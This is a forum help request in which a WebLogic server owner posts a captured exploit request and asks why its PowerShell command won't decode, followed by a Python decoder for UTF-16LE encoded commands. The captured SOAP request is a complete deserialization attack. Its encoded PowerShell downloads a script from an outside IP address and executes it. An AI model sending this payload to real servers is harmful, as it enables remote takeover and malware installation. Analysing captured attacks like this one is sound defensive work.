trojan81 asked (category: web server)
Wireshark capture on Oracle remote command execution attempt
Experts, I captured the packet of an exploit attempt on my Oracle WebLogic server.
I am not able to decode the PowerShell command. It appears to be base64 encoded. Can anyone tell me why I can't decrypt it?
Contents of the TCP stream below:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 100.100.80.50:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
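The reason a plain Base64 decode of a `-E` (`-EncodedCommand`) argument looks like garbage is that PowerShell expects the Base64 to wrap the command text in UTF-16LE, not UTF-8, so every ASCII character comes out followed by a NUL byte. The decoder below is an added example for analysing a capture like the one above; it is not part of the original post or of any answer on this page. The sample command it encodes is constructed, and the function names and the regular expression used to pull the argument out of the `<string>` element are my own choices, not a PowerShell or WebLogic API.

```python
import base64
import re
from typing import Optional


def _strip(b64: str) -> str:
    """Drop all whitespace: captured or copied payloads are often line-wrapped."""
    return re.sub(r"\s+", "", b64)


def encode_command(command: str) -> str:
    """Encode a command the way PowerShell expects it for -EncodedCommand
    (Base64 over UTF-16LE). Used here only to build a constructed sample."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def naive_decode(b64: str) -> str:
    """What a plain Base64 decode shows: the text with a NUL after every
    ASCII character, which is why it appears undecodable."""
    raw = base64.b64decode(_strip(b64))
    return raw.decode("latin-1")  # byte-for-byte view, no decoding errors


def decode_encoded_command(b64: str) -> str:
    """Correct decode: Base64, then UTF-16LE."""
    raw = base64.b64decode(_strip(b64))
    return raw.decode("utf-16-le")


# Matches -E, -enc or -EncodedCommand followed by the Base64 argument, allowing
# the wrapping whitespace seen in captures. "-EP ByPass" does not match because
# no whitespace follows the "E". (Hypothetical pattern, written for this example.)
ENCODED_ARG = re.compile(
    r"-(?:E|enc|EncodedCommand)\s+([A-Za-z0-9+/=\s]+)", re.IGNORECASE
)


def extract_encoded_argument(text: str) -> Optional[str]:
    """Pull the Base64 argument out of a command line (or a <string> element
    holding one) and normalise it; None if no encoded command is present."""
    m = ENCODED_ARG.search(text)
    return _strip(m.group(1)) if m else None


if __name__ == "__main__":
    # Constructed sample, not the payload from the capture.
    sample = "Write-Output 'constructed sample'"
    encoded = encode_command(sample)
    # Simulate the line wrapping a packet-capture export introduces.
    wrapped = encoded[:12] + " \n " + encoded[12:]
    element = f"<string>PowerShell.exe -NoP -EP ByPass -W Hidden -E {wrapped}</string>"
    arg = extract_encoded_argument(element)
    print("naive  :", repr(naive_decode(arg)))
    print("decoded:", decode_encoded_command(arg))
```

To analyse the capture above, pass the text of the third `<string>` element to `extract_encoded_argument` and the result to `decode_encoded_command`; `naive_decode` on the same input reproduces the NUL-interleaved output that makes the payload look encrypted.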